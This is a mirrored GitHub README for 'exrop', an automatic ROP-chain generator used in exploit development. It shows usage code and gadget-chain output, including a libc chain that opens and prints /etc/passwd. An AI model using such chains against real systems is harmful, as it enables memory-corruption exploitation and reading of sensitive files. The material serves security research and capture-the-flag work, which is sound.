16

GitHub - d4em0n/exrop: Automatic ROPChain Generation

 4 years ago
source link: https://github.com/d4em0n/exrop
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

README.md

exrop

Automatic ROP Chain Generation

requirements : Triton, ROPGagdget

from Exrop import Exrop

rop = Exrop("/bin/ls")
rop.find_gadgets(cache=True)
print("write-regs gadgets: rdi=0x41414141, rsi:0x42424242, rdx: 0x43434343, rax:0x44444444, rbx=0x45454545")
chain = rop.set_regs({'rdi':0x41414141, 'rsi': 0x42424242, 'rdx':0x43434343, 'rax':0x44444444, 'rbx': 0x45454545})
chain.dump()
print("write-what-where gadgets: [0x41414141]=0xdeadbeefff, [0x43434343]=0x110011")
chain = rop.set_writes({0x41414141: 0xdeadbeefff, 0x43434343: 0x00110011})
chain.dump()
print("write-string gadgets 0x41414141=\"Hello world!\\n\"")
chain = rop.set_string({0x41414141: "Hello world!\n"})
chain.dump()
print("func-call gadgets 0x41414141(0x20, 0x30, \"Hello\")")
chain = rop.func_call(0x41414141, (0x20, 0x30, "Hello"), 0x7fffff00)
chain.dump()

Output:

write-regs gadget: rdi=0x41414141, rsi:0x42424242, rdx: 0x43434343, rax:0x44444444, rbx=0x45454545
$RSP+0x0000 : 0x00000000000060d0 # pop rbx; ret
$RSP+0x0008 : 0x0000000044444444
$RSP+0x0010 : 0x0000000000014852 # mov rax, rbx; pop rbx; ret
$RSP+0x0018 : 0x0000000000000000
$RSP+0x0020 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0028 : 0x0000000041414141
$RSP+0x0030 : 0x000000000000629c # pop rsi; ret
$RSP+0x0038 : 0x0000000042424242
$RSP+0x0040 : 0x0000000000003a62 # pop rdx; ret
$RSP+0x0048 : 0x0000000043434343
$RSP+0x0050 : 0x00000000000060d0 # pop rbx; ret
$RSP+0x0058 : 0x0000000045454545

write-what-where gadgets: [0x41414141]=0xdeadbeefff, [0x43434343]=0x110011
$RSP+0x0000 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0008 : 0x000000deadbeefff
$RSP+0x0010 : 0x000000000000d91f # mov rax, rdi; ret
$RSP+0x0018 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0020 : 0x0000000041414139
$RSP+0x0028 : 0x000000000000e0fb # mov qword ptr [rdi + 8], rax; ret
$RSP+0x0030 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0038 : 0x0000000000110011
$RSP+0x0040 : 0x000000000000d91f # mov rax, rdi; ret
$RSP+0x0048 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0050 : 0x000000004343433b
$RSP+0x0058 : 0x000000000000e0fb # mov qword ptr [rdi + 8], rax; ret

write-string gadgets 0x41414141="Hello world!\n"
$RSP+0x0000 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0008 : 0x6f77206f6c6c6548
$RSP+0x0010 : 0x000000000000d91f # mov rax, rdi; ret
$RSP+0x0018 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0020 : 0x0000000041414139
$RSP+0x0028 : 0x000000000000e0fb # mov qword ptr [rdi + 8], rax; ret
$RSP+0x0030 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0038 : 0x0000000a21646c72
$RSP+0x0040 : 0x000000000000d91f # mov rax, rdi; ret
$RSP+0x0048 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0050 : 0x0000000041414141
$RSP+0x0058 : 0x000000000000e0fb # mov qword ptr [rdi + 8], rax; ret

func-call gadgets 0x41414141(0x20, 0x30, "Hello")
$RSP+0x0000 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0008 : 0x0000006f6c6c6548
$RSP+0x0010 : 0x000000000000d91f # mov rax, rdi; ret
$RSP+0x0018 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0020 : 0x000000007ffffef8
$RSP+0x0028 : 0x000000000000e0fb # mov qword ptr [rdi + 8], rax; ret
$RSP+0x0030 : 0x0000000000004ce5 # pop rdi; ret
$RSP+0x0038 : 0x0000000000000020
$RSP+0x0040 : 0x000000000000629c # pop rsi; ret
$RSP+0x0048 : 0x0000000000000030
$RSP+0x0050 : 0x0000000000003a62 # pop rdx; ret
$RSP+0x0058 : 0x000000007fffff00
$RSP+0x0060 : 0x0000000041414141

python3 tests.py  1,48s user 0,05s system 97% cpu 1,566 total

Another example: open-read-write gadgets!

from pwn import *
from Exrop import Exrop

binname = "/lib/x86_64-linux-gnu/libc.so.6"
libc = ELF(binname, checksec=False)
open = libc.symbols['open']
read = libc.symbols['read']
write = libc.symbols['write']
bss = libc.bss()


rop = Exrop(binname)
rop.find_gadgets(cache=True)
#print("func-call gadgets 0x41414141(0x20, 0x30, \"Hello\")")
#chain = rop.func_call(0x41414141, (0x20, 0x30, "Hello"), 0x7fffff00)
print("open('/etc/passwd', 0)")
chain = rop.func_call(open, ("/etc/passwd", 0), bss)
chain.dump()
print("read(2, bss, 0x100)")
chain = rop.func_call(read, (2, bss, 0x100))
chain.dump()
print("write(1, bss, 0x100)")
chain = rop.func_call(write, (1, bss, 0x100))
chain.dump()

Output:

open('/etc/passwd', 0)
$RSP+0x0000 : 0x000000000002155f # pop rdi; ret
$RSP+0x0008 : 0x00000000003ec860
$RSP+0x0010 : 0x0000000000155fc6 # pop r8; mov eax, 1; ret
$RSP+0x0018 : 0x7361702f6374652f
$RSP+0x0020 : 0x0000000000044359 # mov qword ptr [rdi], r8; ret
$RSP+0x0028 : 0x000000000002155f # pop rdi; ret
$RSP+0x0030 : 0x00000000003ec868
$RSP+0x0038 : 0x0000000000155fc6 # pop r8; mov eax, 1; ret
$RSP+0x0040 : 0x0000000000647773
$RSP+0x0048 : 0x0000000000044359 # mov qword ptr [rdi], r8; ret
$RSP+0x0050 : 0x000000000002155f # pop rdi; ret
$RSP+0x0058 : 0x00000000003ec860
$RSP+0x0060 : 0x0000000000023e6a # pop rsi; ret
$RSP+0x0068 : 0x0000000000000000
$RSP+0x0070 : 0x000000000010fc40

read(2, bss, 0x100)
$RSP+0x0000 : 0x00000000001306d9 # pop rdx; pop rsi; ret
$RSP+0x0008 : 0x0000000000000100
$RSP+0x0010 : 0x00000000003ec860
$RSP+0x0018 : 0x000000000002155f # pop rdi; ret
$RSP+0x0020 : 0x0000000000000002
$RSP+0x0028 : 0x0000000000110070

write(1, bss, 0x100)
$RSP+0x0000 : 0x00000000001306d9 # pop rdx; pop rsi; ret
$RSP+0x0008 : 0x0000000000000100
$RSP+0x0010 : 0x00000000003ec860
$RSP+0x0018 : 0x000000000002155f # pop rdi; ret
$RSP+0x0020 : 0x0000000000000001
$RSP+0x0028 : 0x0000000000110140

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK